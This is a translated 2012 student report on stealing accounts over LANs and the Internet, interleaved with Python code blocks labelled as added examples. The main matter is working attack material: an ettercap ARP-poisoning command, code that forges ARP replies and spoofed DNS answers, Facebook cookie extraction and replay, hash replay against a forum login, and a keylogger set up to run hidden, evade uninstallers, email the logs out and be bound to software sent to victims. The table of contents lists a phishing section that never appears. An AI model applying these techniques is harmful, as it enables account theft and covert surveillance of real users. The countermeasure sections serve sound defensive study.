Information Systems Safety and Security
Group 2 - K09406 - 2012

FACULTY OF MANAGEMENT INFORMATICS

INFORMATION SYSTEMS SAFETY AND SECURITY

Stealing Account Information on LANs and the Internet

Supervising lecturer: Trương Hoài Phan

Students:
1. Nguyễn Mạnh Lâm (K094061155)
2. Lê Thị Kiều Oanh (K094061173)
3. Lê Thị Thu (K094061188)
4. Nguyễn Thị Thúy (K094061190)
5. Đỗ Thị Thanh Trang (K094061202)

Ho Chi Minh City, 2012


INSTRUCTOR'S COMMENTS


Table of Contents

A. BRIEF INTRODUCTION
B. LOCAL AREA NETWORK
  I. SSL Strip
    1. SSL Strip
    2. How it is carried out
    3. Remarks and countermeasures
  II. Stealing Cookies, Hijacking Sessions
    1. ARP and ARP poisoning
    2. Stealing cookies and hijacking the session
    3. Conclusion and countermeasures
  III. DNS Spoofing
    1. DNS Spoofing
    2. Steps
    3. Conclusion and countermeasures
  IV. Sniffing Passwords With Wireshark
    1. Wireshark
    2. How it is carried out
    3. Conclusion and countermeasures
C. INTERNET NETWORK
  I. Stealing Yahoo, Gmail and Facebook Account Information With a Keylogger
    1. Keylogger
    2. How it is carried out
    3. Conclusion and countermeasures
  II. Using a Phishing Website
    1. How it is carried out
    2. Context and what is achieved
    3. Remarks and countermeasures
D. GROUP MEMBERS AND DIVISION OF WORK


A. BRIEF INTRODUCTION

A local area network (LAN) connects computers to one another within a single area. The connection is made over a high-speed transmission medium such as cabling. LANs can also be joined to one another to form a WAN. A LAN usually includes a server (host), also called the serving machine; the server is usually a machine with a fast processor (CPU), a large memory (RAM) and a large hard disk (HD).

The Internet is a publicly accessible, global information system made up of interconnected computer networks. It carries information by packet switching on top of a standardized internetworking protocol, the IP protocol. It comprises thousands of smaller computer networks belonging to businesses, research institutes and universities, individual users and governments around the world.

A sniffer is a form of eavesdropping on a network that relies on the characteristics of the TCP/IP mechanism. It is also a security technique, developed to help network administrators examine and check the data flowing over the network efficiently. There are two kinds of sniffer: active and passive. A passive sniffer only listens and works on shared media such as a hub; on a switched LAN the attacker must actively redirect traffic to himself, which is what ARP poisoning does.

The sniffing process:

- Step 1: Carry out ARP poisoning, using tools such as ettercap on Linux and Cain & Abel on Windows.
- Step 2: After ARP poisoning, the hacker's machine becomes the man in the middle and sniffs the packets exchanged between the victim's machine and the gateway. The hacker can then capture packets that carry important information, for example the packets used to log in to websites and email. With various methods, the hacker can sniff cookies, hijack sessions, and perform DNS spoofing to send the victim to a spoofed address.

B. LOCAL AREA NETWORK

I. SSL Strip

1. SSL Strip

SSL and HTTPS

Secure Sockets Layer (SSL), or Transport Layer Security (TLS) in its more modern implementation, is a protocol designed to provide security for network communication by means of encryption. It is most often combined with other protocols to provide a secure implementation of the service those protocols offer. Examples include SMTPS, IMAPS and HTTPS. The ultimate goal is to create secure channels over insecure networks.

In this part we focus on attacking SSL over HTTP, known as HTTPS, since it is the most common use of SSL. You may not realize it, but you almost certainly use HTTPS every day. The most popular email services and online banking applications all rely on HTTPS to ensure that communication between your web browser and their servers is encrypted. Without this technology, anyone with a packet sniffer on the network could recover usernames, passwords and anything else that should stay hidden.

The process HTTPS uses to keep data secure centers on the distribution of certificates between the server, the client and a trusted third party. Take the example of a user trying to connect to a Gmail account. The process has a few distinct steps, simplified in Figure 1 below.

Figure 1: The HTTPS communication process

The process sketched in Figure 1 is not a detailed one, but basically it works as follows:

- The client browser connects to http://www.mail.google.com on port 80 using HTTP.
- The server redirects the client to the HTTPS version of the site using an HTTP 302 code.
- The client connects to https://www.mail.google.com on port 443.
- The server provides the client with a certificate that carries the server's digital signature. The certificate is used to verify the identity of the site.
- The client takes the certificate and validates it against its list of trusted certificate authorities.
- Encrypted communication follows.

If certificate validation fails, the website has failed to prove its identity. At that point the user is shown a certificate validation error and can still continue at his own risk, since he may well not be communicating with the website he thinks he is visiting.

Defeating HTTPS

This process was considered highly secure until a few years ago, when an attack was published that could successfully hijack the communication. The attack does not involve defeating SSL itself; rather, it defeats the bridge between unencrypted and encrypted communication.

Moxie Marlinspike, a leading security researcher, observed that in most cases SSL is never attacked directly. Most of the time an SSL connection is initiated through HTTPS because someone was redirected to HTTPS by an HTTP 302 response, or clicked a link that sent them to an HTTPS site, such as a login button. The idea is that if you attack the transition from an insecure connection to a secure one, in this case from HTTP to HTTPS, you are attacking the bridge and can man-in-the-middle the SSL connection before it even exists. To do this effectively, Moxie created the tool SSLstrip, which we use below.

The procedure is fairly simple and resembles the attacks studied in the earlier parts of this material. It is sketched in Figure 2 below.

Figure 2: Hijacking HTTPS communication

The process sketched in Figure 2 works as follows:

- Traffic between the client and the server is first intercepted.
- Whenever an HTTPS URL is encountered, sslstrip replaces it with an HTTP link and keeps a map of the changes it made.
- The attacking machine supplies certificates to the web server and impersonates the client.
- Traffic is received back from the secure website and handed back to the client.

The process works quite well: the server involved still receives SSL traffic and does not know the difference. The only noticeable difference in the user's experience is that the traffic is not flagged as HTTPS in the browser, so an experienced user can notice that something is wrong.
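The rewriting step in the list above is the whole trick, so here is an added example (not code from the report, and not Moxie Marlinspike's SSLstrip) of the proxy-side state it needs: https:// links and redirect targets in the server's responses become http://, the hosts that were downgraded are remembered so the proxy can re-upgrade when it talks to the real server, and the Secure flag is dropped from cookies so the browser keeps sending them over plain HTTP. The last function models the browser's HSTS cache, the case a strip proxy never gets to see. All hosts, HTML and headers are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Matches an absolute https:// URL up to the end of its host[:port] part.
HTTPS_URL = re.compile(r"https://([A-Za-z0-9.\-]+)(:\d+)?", re.IGNORECASE)


class StripState:
    """Hosts whose https:// links the proxy has already rewritten to http://.

    The client now speaks plain HTTP to the proxy for these hosts, while the
    proxy keeps speaking HTTPS to the real server (the 'map' in Figure 2).
    """

    def __init__(self):
        self.stripped_hosts = set()

    def strip_body(self, body):
        """Rewrite every https:// URL in a response body to http:// and record the host."""
        def downgrade(match):
            host = match.group(1).lower()
            self.stripped_hosts.add(host)
            return "http://" + host + (match.group(2) or "")
        return HTTPS_URL.sub(downgrade, body)

    def strip_response_headers(self, status, headers):
        """Rewrite a redirect to HTTPS (the HTTP 302 'bridge') and drop the
        Secure flag from cookies so the browser still sends them over HTTP."""
        out = {}
        for name, value in headers.items():
            lname = name.lower()
            if lname == "location" and status in (301, 302, 303, 307, 308):
                value = self.strip_body(value)
            elif lname == "set-cookie":
                value = re.sub(r";\s*secure\b", "", value, flags=re.IGNORECASE)
            out[name] = value
        return status, out

    def upstream_scheme(self, host):
        """Scheme the proxy uses toward the real server for a plain-HTTP client request."""
        return "https" if host.lower() in self.stripped_hosts else "http"


def browser_request_scheme(url, hsts_cache):
    """What actually leaves the victim's browser.

    A host with a cached Strict-Transport-Security entry (RFC 6797) is upgraded
    to https:// inside the browser, so the proxy never sees a plaintext request
    to strip. hsts_cache is a set of hostnames, a constructed stand-in for the
    browser's real HSTS store.
    """
    parts = urlsplit(url)
    if parts.scheme == "http" and parts.hostname in hsts_cache:
        return "https"
    return parts.scheme
```

strip_body is also what rewrites the Location header of the 302; the real tool works on the raw byte stream, but the decision logic is the same, and the HSTS case is why a first visit over plain HTTP is the only window the attack has against a site that sends the header.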

2. How it is carried out

Step 1: Carry out ARP poisoning.

Step 2: Configure IP forwarding.

Step 3: Configure iptables to redirect HTTP traffic.

Step 4: Run sslstrip.

Once this is done, you can hijack any SSL connection being set up. From here you can start a sniffer and collect passwords and other personal identifying information, such as credit card numbers, from the traffic.

3. Remarks and countermeasures

As described above, SSL hijacking done this way is almost impossible to detect on the server side, because the server believes it is communicating normally with the client; it has no idea it is talking to the client through a proxy. Detection therefore falls on the user, who has to notice that the login page arrived over http:// without the padlock. Keeping the browser up to date matters: browsers that honour HTTP Strict Transport Security (RFC 6797) refuse to load a site over plain HTTP once it has sent an HSTS header, which removes the downgrade window for every visit after the first. Browsers other than Internet Explorer are recommended.

II. Stealing Cookies, Hijacking Sessions

1. ARP and ARP poisoning

To understand the process of stealing cookies with BackTrack 4, we first need to know a little about ARP and ARP poisoning. So what is ARP?

In practice, network interface cards (NICs) can only reach one another by MAC address, the fixed, unique address of the hardware. So we need a mechanism to translate between these two kinds of address (IP and MAC), and that is the Address Resolution Protocol (ARP).

How does ARP work on a LAN? Understanding how ARP works makes it easy to understand what ARP poisoning is. When a network device wants the MAC address of a device whose network-layer (IP) address it knows, it broadcasts an ARP request containing its own MAC address and the IP address of the device whose MAC it needs. Every device that receives the request compares the IP address in it with its own network-layer address; if they match, the device must send back to the requester a packet (an ARP reply) containing its MAC address.

ARP spoofing exploits the inherently insecure nature of the ARP protocol. Unlike other protocols such as DNS (which can be configured to accept only secured dynamic updates), devices that use ARP accept updates at any time. This means any device can send an ARP reply to another computer, and that computer will update its ARP cache with the new value immediately. Sending an ARP reply when no request was made is called a gratuitous ARP. When such malicious ARP replies reach a computer, it believes that the sender is the party it is looking for, while in reality the victim is now talking to an attacker.

2. Stealing cookies and hijacking the session

The term session hijacking covers a range of different attacks. In general, any attack that involves exploiting a session between devices counts as session hijacking. Once the hacker is the man in the middle, he can capture the packets flowing through the victim's network card, analyze them, find the cookie, take over the victim's session and use the victim's online account without ever authenticating with a username and password.

In practice nothing that crosses the network is secure, and session data is no different. The principle behind most forms of session hijacking is that if the hacker can intercept some part of the session establishment, he can use that data to impersonate one of the parties involved in the communication and thereby access the session.

To make cookie theft and session hijacking concrete, the group set up a scenario: the victim logs in to Facebook, and the hacker steals the victim's cookies and uses them to get into the victim's Facebook account without a username or password.

In the example scenario, the group performs a session hijacking attack by intercepting the communication of a user who is logged in to his Facebook account. Using the intercepted communication, the group impersonates the user and accesses the account from the attacking machine. The attack is carried out with BackTrack 4.

First, the victim logs in to Facebook from his own machine.

Figure: Home page of the victim's account

Figure: Network settings of the victim's machine

Step 1: Boot BackTrack 4 on the attacking machine and open Konsole (boxed in the figure); the first thing to do is ARP poisoning.

Step 2: In the Konsole window, type the command ettercap -T -p -M arp /192.168.1.100/ /192.168.1.1/ -i eth0 (eth0 because a wired network is used), where 192.168.1.100 is the victim's IP address and 192.168.1.1 is the victim's default gateway.

After entering the command, BackTrack 4 reports that ARP poisoning succeeded, and messages about the victim logging in to Facebook are displayed.

Step 3: With ARP poisoned, the group captures the traffic and analyzes the packets; because ARP has been poisoned, the victim's packets are certain to pass through the attacker and be captured.

Start Wireshark in BackTrack 4. In Wireshark's main window the group selects eth0, since a wired network is used. Wireshark then starts capturing packets from the victim's machine.

When the capture is done, since the group is after cookies, only the packets that carry the victim's cookies are of interest, so those packets are filtered out (for example with the display filter http.cookie).

Step 4: Among the filtered packets, the group looks for the one whose cookies relate to the victim's Facebook login, in order to steal them. Once the packet carrying the victim's cookies is found, the cookie values are copied out. Of all the victim's cookies, the group cares only about c_user and xs.

Step 5: From the stolen cookie values, the group creates the cookies c_user and xs in its own browser; this is done in Firefox with the Cookies Manager+ add-on. In the Add Cookie dialog the two cookies c_user and xs are added.

Step 6: Done. With the stolen cookies in place, the group opens the browser and types facebook.com in the address bar; the browser lands in the victim's Facebook account.
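What the group does by hand in Wireshark and Cookies Manager+ in steps 3 to 6, as an added example in Python (not from the report): parse a captured HTTP request, keep only the cookies that identify the session (c_user and xs here), and build the request the attacker's browser would send with them. The captured request and every ID in it are constructed for the example. The last function is the server-side check that prevents this capture in the first place.

```python
# A captured HTTP request, constructed for this example (the IDs are fake).
CAPTURED_REQUEST = (
    b"GET /home.php HTTP/1.1\r\n"
    b"Host: www.facebook.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: datr=QmjqTxZ1; c_user=100000000001; xs=12%3Aabc123%3A2%3A1330000000\r\n"
    b"Connection: keep-alive\r\n\r\n"
)

SESSION_COOKIES = ("c_user", "xs")   # the two values the report replays


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers); header names lowercased."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, path, headers


def parse_cookie_header(value):
    """'a=1; b=2' -> {'a': '1', 'b': '2'} (values left URL-encoded, as the browser sends them)."""
    cookies = {}
    for pair in value.split(";"):
        name, sep, val = pair.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies


def extract_session_cookies(raw, names=SESSION_COOKIES):
    """Pull only the session-bearing cookies out of a captured request (Step 4)."""
    _, _, headers = parse_request(raw)
    found = {}
    for header_value in headers.get("cookie", []):
        for name, val in parse_cookie_header(header_value).items():
            if name in names:
                found[name] = val
    return found


def build_replay_request(host, path, cookies):
    """The request the attacker's browser sends once the cookies are planted (Steps 5-6)."""
    cookie_line = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_line}\r\n\r\n".encode()


def missing_cookie_protections(set_cookie_value):
    """Server-side check: a session cookie without Secure travels in cleartext and
    can be sniffed exactly as above; without HttpOnly, page script can read it too."""
    attrs = {p.strip().split("=")[0].lower() for p in set_cookie_value.split(";")[1:]}
    return [flag for flag in ("secure", "httponly") if flag not in attrs]
```

The replay works because the two cookie values are the whole proof of identity; nothing in the request ties them to the victim's machine, so the server cannot tell the two browsers apart.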

3. Conclusion and countermeasures

By stealing cookies the hacker can get into the victim's account and impersonate the victim for his own ends, mostly fraud. He cannot, however, take the account over, because he does not know the password. As soon as the user logs out, the session the cookies refer to becomes invalid on the server side, so a hacker who captured them can no longer use them. This only holds if the site actually invalidates the session when the user logs out rather than merely clearing the cookie in the user's browser. On the server side the real fix is to serve the whole logged-in session over HTTPS and mark the session cookies Secure (and HttpOnly), so they are never sent in cleartext for a sniffer to capture in the first place.

Beyond that, a few measures reduce the risk:

Access from home: the chance that someone intercepts your traffic on a home network is much smaller than at work. This is not because your home computer is more secure, but because you only have one or two machines at home. On another LAN (at work, for instance) you do not know what is going on down in the lobby or in a branch office 200 miles away, so the potential sources of attack are many. Be aware that one of the biggest targets of session hijacking is online banking, but it applies to everything else too.

Know the attack: sophisticated attackers, even the most experienced hackers, can make mistakes and leave traces of their attack. Knowing when you were logged in to session-based services can tell you whether someone is lurking on your account. So keep an eye on everything, and check the most recent login time to make sure all is well.

Secure the internal machines: these attacks are usually carried out from inside the network. If your network devices are secure, the attacker has less opportunity to compromise hosts inside your network, which lowers the risk of session hijacking.

III. DNS Spoofing

1. DNS Spoofing

DNS spoofing

DNS spoofing is a MITM technique used to supply false DNS information to a host, so that when the user browses to some address, for example www.yahoo.com at IP address XXX.XX.XX.XX, the attempt is instead sent to a spoofed address (www.24h.com.vn in the example) at IP YYY.YY.YY.YY, an address the attacker prepared in advance to steal online banking account information from the user.

DNS communication

The Domain Name System (DNS) protocol, defined in RFC 1034/1035, can be considered one of the most important protocols in use on the Internet. Put simply, whenever you type a web address such as http://www.google.com into the browser, a DNS request is sent to a DNS server to find the IP address matching the domain name you entered. Routers and other Internet devices have no idea what google.com is; they only understand addresses such as 74.125.95.103.

A DNS server works by keeping a database of entries (called resource records) that map IP addresses to DNS names, and by passing those resource records to clients and to other DNS servers. The DNS server architecture across an enterprise and across the Internet is a rather complicated affair; in fact, you could fill dedicated books with DNS architecture. We will not go into the architectural aspects or even the different kinds of DNS traffic, only a basic DNS transaction.

Figure 1: DNS query and response

DNS operates as query and response. A client that needs the IP address for a name sends a query to a DNS server, and the DNS server sends the requested information back in its response. From the client's point of view only two packets appear: the query and the response.

The scenario becomes a little more complex when DNS recursion is considered. Because of the hierarchical structure of DNS on the Internet, DNS servers need to be able to talk to one another in order to answer the queries submitted by clients. If everything goes as expected, our internal DNS server knows the name-to-address mapping for the servers on the local network, but it cannot be expected to know the addresses for Google or Dell. This is where recursion plays its part. Recursion happens when one DNS server queries another DNS server on behalf of the client that made the request; in essence it turns a DNS server into a client.

2. Steps

Step 1: Open the file etter.dns.

Step 2: Point the domain name at the chosen IP address (a line of the form www.yahoo.com A <attacker-ip> in etter.dns).

Step 3: ARP-poison the victim and load the dns_spoof plugin.

Step 4: When the victim visits one of the domain names edited in step 2, ettercap prints a notification.

Step 5: Open www.yahoo.com to see the result of the DNS spoofing.
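The dns_spoof plugin's job in steps 2 to 4, as an added example (not the report's or ettercap's code): read etter.dns-style rules, and when the victim's query for a matching name is seen, forge a response that carries the same transaction ID and question, an authoritative-answer flag and a single A record pointing at the attacker's address. The rule file, the transaction IDs and the address 192.168.1.50 are constructed for the example; real etter.dns rules use the same hostname, type, address layout.

```python
import fnmatch
import struct

# An etter.dns-style rule set, constructed for this example (format: name type address).
ETTER_DNS = """
# send the victim's yahoo traffic to a host the attacker controls
www.yahoo.com   A   192.168.1.50
*.yahoo.com     A   192.168.1.50
"""


def parse_etter_dns(text):
    """Return [(name_pattern, record_type, address)] from an etter.dns-style file."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, rtype, addr = line.split()
        rules.append((name.lower(), rtype.upper(), addr))
    return rules


def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.strip(".").split(".")) + b"\x00"


def decode_name(pkt, offset):
    """Decode a label sequence at offset (no compression needed in the question section)."""
    labels = []
    while True:
        length = pkt[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(pkt[offset:offset + length].decode())
        offset += length


def build_dns_query(txid, name, qtype=1):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, one question
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def build_spoofed_response(query, rules, ttl=3600):
    """Forge the answer the dns_spoof plugin would send: same transaction ID and
    question as the victim's query, QR|AA|RD|RA flags, one A record with the
    attacker's IP. Returns None when no rule matches (the real answer then wins)."""
    txid, _flags, qdcount = struct.unpack("!HHH", query[:6])
    if qdcount != 1:
        return None
    qname, offset = decode_name(query, 12)
    qtype, _qclass = struct.unpack("!HH", query[offset:offset + 4])
    if qtype != 1:
        return None
    for pattern, rtype, addr in rules:
        if rtype == "A" and fnmatch.fnmatchcase(qname.lower(), pattern):
            break
    else:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 0, 0)   # one answer
    question = query[12:offset + 4]
    rdata = bytes(int(octet) for octet in addr.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def first_a_record(response):
    """(txid, ip) of the first A answer, as the victim's resolver would read it."""
    txid, _flags, _qd, ancount = struct.unpack("!HHHH", response[:8])
    if ancount == 0:
        return txid, None
    _name, offset = decode_name(response, 12)
    offset += 4      # skip QTYPE/QCLASS of the echoed question
    offset += 2      # compressed answer name (pointer to the question name)
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", response[offset:offset + 10])
    rdata = response[offset + 10:offset + 10 + rdlen]
    ip = ".".join(str(b) for b in rdata) if rtype == 1 else None
    return txid, ip
```

The victim's resolver accepts whichever response with the right transaction ID and question arrives first; with the attacker in the middle that is always the forged one, which is why the real server never has to be touched.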

3. Conclusion and countermeasures

DNS spoofing is quite hard to defend against, because there are few signs of attack. Usually you do not know your DNS has been spoofed until it has already happened, which makes this an extremely dangerous attack method. Countermeasures:

- Protect your internal machines: attacks like this one are usually launched from inside your network. If your network devices are secure, there is less chance of hosts being compromised and used to launch a spoofing attack.
- Do not rely on DNS for secure systems: on highly sensitive, secured systems, the best practice is not to browse the Internet from them at all, so that DNS is not used. If software on them needs hostnames for some of its work, give it what it needs in the device's hosts file rather than through DNS.
- Use an IDS: an intrusion detection system, correctly placed and deployed, can flag most forms of ARP cache poisoning and DNS spoofing.
- Use DNSSEC: DNSSEC is a newer alternative to DNS that uses digitally signed DNS records to guarantee the validity of a query response. Although DNSSEC is not yet widely deployed, it is accepted as the future of DNS. Note that DNSSEC validation normally happens on the recursive resolver; an attacker sitting between the client and its resolver, as in this LAN scenario, can still forge the final answer unless the client validates the signatures itself or its path to the resolver is protected.

IV. Sniffing Passwords With Wireshark

1. Wireshark

Wireshark is a network protocol analyzer that lets you look at the details of network protocols, capture packets and analyze them offline, and analyze VoIP. It can read and write many capture formats, such as tcpdump (libpcap), Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer, and more. gzip-compressed capture files are decompressed on the fly, and it can decrypt many protocols, such as IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS and WEP, given the keys. It works with many link types, including Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay and FDDI.

The hacker sniffs the packets and captures the username and password used to log in to a forum, where the password is sent as an MD5 hash; the hacker then guesses the password against the hash and recovers it. In fact, as step 3 below shows, he does not even need to crack it: because the server compares the submitted hash directly with the stored one, the captured hash is itself the credential and can simply be replayed.

The hashing and authentication process:

- Step 1: The client runs an MD5 function written in JavaScript over the password and sends the hash to the server with POST or GET.
- Step 2: The server receives the hash and compares it with the database.
- Step 3: The server reports success and the user is logged in.
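The three-step forum login above, as an added example in Python (not the forum's JavaScript or server code): the user database, the client-side MD5 step and the server comparison, showing that the hash captured by Wireshark logs in on its own; beside it, a challenge-response variant in which the server issues a one-time nonce, so a captured response cannot be replayed. Username, password and nonce handling are constructed for the example.

```python
import hashlib
import hmac
import os

# What the forum stores, constructed for this example: username -> MD5(password).
USER_DB = {"alice": hashlib.md5(b"s3cret!").hexdigest()}


def client_md5_login(username, password):
    """Step 1 as the forum's JavaScript does it: the browser hashes and sends the hash."""
    return {"user": username, "pwd_md5": hashlib.md5(password.encode()).hexdigest()}


def forum_verify(form):
    """Step 2: the server compares the submitted hash with the stored one.
    Whatever reached the server in cleartext (the sniffed form) is enough to log
    in; the attacker never needs the password itself."""
    return USER_DB.get(form["user"]) == form["pwd_md5"]


class ChallengeServer:
    """A replay-resistant variant: the server issues a one-time nonce and the
    client proves knowledge of the hash with HMAC(nonce). A captured response
    is useless once the nonce is consumed. The stored hash is still
    password-equivalent, so this belongs behind TLS, not instead of it."""

    def __init__(self, user_db):
        self.user_db = user_db
        self.outstanding = set()

    def challenge(self):
        nonce = os.urandom(16).hex()
        self.outstanding.add(nonce)
        return nonce

    @staticmethod
    def client_response(pwd_md5_hex, nonce):
        return hmac.new(bytes.fromhex(pwd_md5_hex), bytes.fromhex(nonce),
                        hashlib.sha256).hexdigest()

    def verify(self, username, nonce, response):
        if nonce not in self.outstanding:          # unknown or already used
            return False
        self.outstanding.discard(nonce)             # one use only
        stored = self.user_db.get(username)
        if stored is None:
            return False
        expected = self.client_response(stored, nonce)
        return hmac.compare_digest(expected, response)
```

The challenge-response variant only defeats replay. An attacker who captured both the nonce and the response can still brute-force the password offline, and the stored MD5 remains password-equivalent, so the practical fix for the forum is TLS on the login request together with salted, slow password hashing on the server.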

2. How it is carried out

Step 1: ARP poisoning. The mechanism: to build its ARP table, a computer sends ARP requests and receives ARP replies. The system has no way to verify whether the information in an ARP reply is genuine or forged; it simply stores it in the ARP table for use. Exploiting this weakness, the attacker poisons the ARP system by sending an unsolicited ARP reply to the target host. The forged reply pairs the attacker's hardware address with the IP address of the device being impersonated, so the victim's ARP table now maps that IP to the attacker.

Step 2: Run Wireshark and capture the packets of a login to the forum vn-zoom.com.

Step 3: With the username and the MD5 hash in hand, the hacker saves the forum's login page, edits the form values, and submits the username and the hashed password.

3. Conclusion and countermeasures

Using commands:

- ipconfig /all shows your own MAC address.
- arp -a shows the ARP table on your machine; check whether the MAC recorded for B is really B's MAC.
- arp -d * clears the whole ARP table, so the poisoned MAC addresses disappear and the computer starts learning again. But if the attacking machine keeps pumping out poisoned ARP packets, clearing the table is useless.
- arp -s pins an IP address to its real MAC, so the attacker can no longer poison that entry. This is not practical on a large network with many computers and changing addresses (DHCP, for example).

Using software: anti-ARP-spoofing software can be installed to avoid accepting forged ARP replies.

Using network equipment: Dynamic ARP Inspection. The switch checks each ARP reply against the DHCP Snooping Binding table to see whether it is valid, and drops it immediately if it is not.
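Both the poisoning mechanism from section II.1 (a gratuitous ARP reply that rewrites the victim's cache) and the arp -a and Dynamic ARP Inspection checks listed here, as one added example (not the report's or ettercap's code): a raw ARP reply is built and parsed with struct, a host-side inspector checks replies against a trusted IP-to-MAC binding table and flags unsolicited ones, and a parser for arp -a output reports hardware addresses that appear under more than one IP. All MAC and IP addresses and the arp -a sample are constructed for the example.

```python
import re
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes(int(x, 16) for x in re.split("[:-]", mac))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP reply frame. Sent unsolicited with sender_ip = the gateway's
    address and sender_mac = the attacker's NIC, this is the poisoning packet."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + bytes(map(int, sender_ip.split(".")))
    arp += mac_bytes(target_mac) + bytes(map(int, target_ip.split(".")))
    return eth + arp


def parse_arp(frame):
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    op = struct.unpack("!H", frame[20:22])[0]
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ".".join(map(str, frame[28:32])),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ".".join(map(str, frame[38:42])),
    }


class ArpInspector:
    """Host-side version of what Dynamic ARP Inspection does on a switch: replies
    are checked against a trusted IP->MAC binding table (here a constructed dict,
    the equivalent of `arp -s` entries or the DHCP snooping binding table)."""

    def __init__(self, bindings):
        self.bindings = {ip: mac.lower() for ip, mac in bindings.items()}
        self.pending = set()          # IPs we have actually asked about

    def sent_request(self, ip):
        self.pending.add(ip)

    def inspect(self, frame):
        """Return a list of findings; an empty list means the reply is accepted."""
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            return []
        findings = []
        trusted = self.bindings.get(arp["sender_ip"])
        if trusted is not None and trusted != arp["sender_mac"]:
            findings.append(f"{arp['sender_ip']} claimed by {arp['sender_mac']}, binding says {trusted}")
        if arp["sender_ip"] not in self.pending:
            findings.append(f"unsolicited reply for {arp['sender_ip']}")
        else:
            self.pending.discard(arp["sender_ip"])
        return findings


def duplicate_macs_in_arp_table(arp_a_output):
    """Parse `arp -a` output (Windows layout, constructed sample below) and report
    MACs listed for more than one IP: the gateway and another host sharing one
    hardware address is the classic sign of poisoning."""
    by_mac = {}
    for line in arp_a_output.splitlines():
        m = re.match(r"\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})", line, re.I)
        if m:
            by_mac.setdefault(m.group(2).lower().replace("-", ":"), []).append(m.group(1))
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


# Constructed `arp -a` output from a poisoned victim.
SAMPLE_ARP_A = """Interface: 192.168.1.100 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-0c-29-3e-5f-a1     dynamic
  192.168.1.50          00-0c-29-3e-5f-a1     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""
```

The inspector needs a trusted binding table to be useful, which is exactly the limitation the text notes for arp -s: on a DHCP network that table has to come from the switch's DHCP snooping rather than from hand-pinned entries.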

C. INTERNET NETWORK

I. Stealing Yahoo, Gmail and Facebook Account Information With a Keylogger

1. Keylogger

A keylogger is a computer program whose purpose is to monitor and record every keystroke to a log file for the person who installed it to use. Because this function violates other people's privacy, keyloggers are classed as spyware. A keylogger is small and uses little memory, which makes it hard to notice.

The keylogger is installed on the victim's machine, or the victim is sent a file with the keylogger attached; the keylogger then sends the victim's account names and passwords to the hacker's mailbox.

Later, as keyloggers developed further, they not only recorded keystrokes but also captured what is shown on the screen, by screenshot or by screen recording, and even tracked how the mouse pointer moves.

There are two kinds of keylogger: hardware keyloggers and software keyloggers.

A keylogger usually consists of three main parts:

- Control program: coordinates operation, adjusts settings, and displays the log files. It can usually only be brought up with a hotkey.
- Installation: ordinary keyloggers, like any other program, have to go through an installation step. The most dangerous kind can get straight onto the user's machine without an installation step, using autorun to start together with the system. Some drop themselves into other programs, so that the keylogger runs whenever the user runs those programs.
- Operation: the keylogger's hook file or monitor program watches the keyboard, records and translates the signals, and writes them to the log file. It can also watch the screen and the mouse.

2. How it is carried out

Step 1: Right-click and choose Option to configure the keylogger.

Step 2: Tick "Run on Windows startup" and "Don't show program icon at startup": together these make the keylogger start automatically and hidden whenever Windows boots; "Show / hide program icon" sets the hotkey. "Remove the program from uninstallation list" hides the keylogger from the Windows Add/Remove Programs list and from similar uninstaller utilities.

Step 3: In the Logging section hide everything as well, then set a Password on the trojan so that only you can manage it.

Step 4: Under "Make screen capture screenshot every", choose how many minutes pass between automatic screenshots (one minute, a few, or longer). Picture Quality is the image quality; the higher it is, the larger the files.

Step 5: In the Email section, set the mailbox the logs are to be sent to.

Once the setup is complete, bind the keylogger to some piece of software and send it to the victim to install. Then open the configured mailbox to check the log files and screen captures the keylogger recorded on the victim's machine.

3. Conclusion and countermeasures

Using a keylogger is a very effective way to record what happens on the victim's screen and keyboard, and thereby capture all of the victim's activity, including usernames and passwords. It is an effective attack method; however, the progress of antivirus and security programs limits the spread and use of common keyloggers. The recommended countermeasures are:

- Limit sharing your computer, and protect it with a password.
- Do not open unknown files of unclear origin; watch out for files with the extensions exe, com, bat, scr, swf, zip, rar.
- Do not visit strange websites.
- Do not click strange links.
- Do not install unknown software.
- Do not download programs from untrusted sources.
